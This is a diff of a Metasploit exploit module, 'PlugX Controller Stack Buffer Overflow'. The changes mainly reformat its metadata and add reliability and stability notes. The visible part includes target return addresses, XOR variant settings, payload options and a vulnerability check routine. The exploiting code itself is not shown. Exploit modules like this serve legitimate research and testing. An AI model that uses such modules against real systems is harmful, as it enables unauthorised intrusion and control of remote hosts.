@@ -10,37 +10,41 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'PlugX Controller Stack Buffer Overflow',
-      'Description'    => %q{
-        This module exploits a stack buffer overflow in the PlugX Controller (C2 server).
-      },
-      'Author'         => 'Professor Plum',
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'PlugX Controller Stack Buffer Overflow',
+        'Description' => %q{
+          This module exploits a stack buffer overflow in the PlugX Controller (C2 server).
+        },
+        'Author' => 'Professor Plum',
+        'License' => MSF_LICENSE,
+        'References' => [
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'thread',
           'AllowWin32SEH' => true
         },
-      'Payload'        =>
-        {
-          'Space'    => 0xe000,
+        'Payload' => {
+          'Space' => 0xe000,
           'BadChars' => '',
           'EncoderType' => Msf::Encoder::Type::AlphanumMixed
         },
-      'Platform'       => 'win',
-      'DisclosureDate' => '2017-07-27',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'DisclosureDate' => '2017-07-27',
+        'Targets' => [
           ['PlugX Type I (old)', { 'xor' => 0, 'callebp' => 0x004045c4 }],
-          ['PlugX Type I',         { 'xor' => 1, 'callebp' => 0x004045c4 }],
-          ['PlugX Type II',        { 'xor' => 2, 'callebp' => 0x004045c4 }]
+          ['PlugX Type I', { 'xor' => 1, 'callebp' => 0x004045c4 }],
+          ['PlugX Type II', { 'xor' => 2, 'callebp' => 0x004045c4 }]
         ],
-      'Privileged'     => false,
-      'DefaultTarget' => 2)
+        'Privileged' => false,
+        'DefaultTarget' => 2,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
     )
 
     register_options(
@@ -97,6 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
     elsif target['xor'] == 2
       return xor_stream2(key, data)
     end
+
     print_status('Unknown PlugX Type')
   end
 
@@ -134,6 +139,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if validate_response(sock.get_once || '')
       return Exploit::CheckCode::Appears
     end
+
     Exploit::CheckCode::Safe
   end
 
